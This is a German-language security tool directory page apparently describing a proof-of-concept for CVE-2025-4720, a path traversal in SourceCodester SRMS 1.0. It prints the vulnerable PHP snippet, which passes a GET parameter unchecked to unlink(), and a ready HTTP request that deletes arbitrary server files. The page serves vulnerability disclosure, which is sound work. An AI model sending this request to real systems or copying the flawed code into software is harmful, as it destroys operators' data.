Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
duplicate-CVE-2025-4720- — Proof-of-concept Exploit für CVE-2025-4720: Path Traversal in SourceCodester SRMS 1.0 ermöglicht beliebiges Löschen von Dateien über einen nicht validierten GET-Parameter. | Kitploit
Tools/GitHubGitHub/xmyronn/duplicate-cve-2025-4720-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubxmyronn/duplicate-cve-2025-4720-

duplicate-CVE-2025-4720-

Proof-of-concept Exploit für CVE-2025-4720: Path Traversal in SourceCodester SRMS 1.0 ermöglicht beliebiges Löschen von Dateien über einen nicht validierten GET-Parameter.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 4 MonatenNoch nicht geprüft

cve-srms-drop-student-path-traversal (CVE-2025-4720)(dupe)

Beliebige Dateilöschung in SourceCodester SRMS 1.0

Beschreibung

Im Endpunkt drop_student.php von SourceCodester Student Result Management System (SRMS) 1.0 existiert eine Path-Traversal-Schwachstelle.

Die Anwendung übernimmt benutzergesteuerte Eingaben aus dem GET-Parameter img und übergibt diese ohne Validierung direkt an die Funktion unlink(). Dadurch kann ein Angreifer beliebige Dateien auf dem Server löschen.


Verwundbarer Code

root@kitploit:~
$img = $_GET['img'];

if ($img == "DEFAULT") {

} else {
    unlink('images/students/' . $img);
}

Schwachstellenart

  • CWE-22: Path Traversal
  • Auswirkung: Beliebige Dateilöschung

Proof of Concept (PoC)

  1. Erstellen Sie eine Datei im Stammverzeichnis der Anwendung: Screenshot 2026-04-04 013454
root@kitploit:~
C:\xampp\htdocs\srms_0\srms\new_test.txt
  1. Senden Sie die folgende Anfrage: Screenshot 2026-04-04 013510
Screenshot 2026-04-04 013633
root@kitploit:~
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
  1. Beobachten Sie, dass die Datei vom Server gelöscht wird. Screenshot 2026-04-04 013650

Auswirkung

Ein Angreifer kann beliebige Dateien löschen, auf die der Webserver Zugriff hat, darunter:

  • Anwendungskonfigurationsdateien
  • Protokolldateien
  • Hochgeladene Inhalte

Dies kann zu Denial-of-Service oder weiteren Angriffen führen.


Zusätzliche Hinweise

Diese Schwachstelle stellt einen eigenständigen Angriffsvektor im Vergleich zu zuvor gemeldeten Problemen in SRMS dar, da sie:

  • eine GET-Anfrage verwendet
  • keinen Dateiupload erfordert
  • potenziell über CSRF ausgenutzt werden kann

Anbieter

SourceCodester


Produkt

Student Result Management System (SRMS) https://www.sourcecodester.com/srms-makumbusho


Version

1.0


Autor

Imad Alvi

Tool herunterladen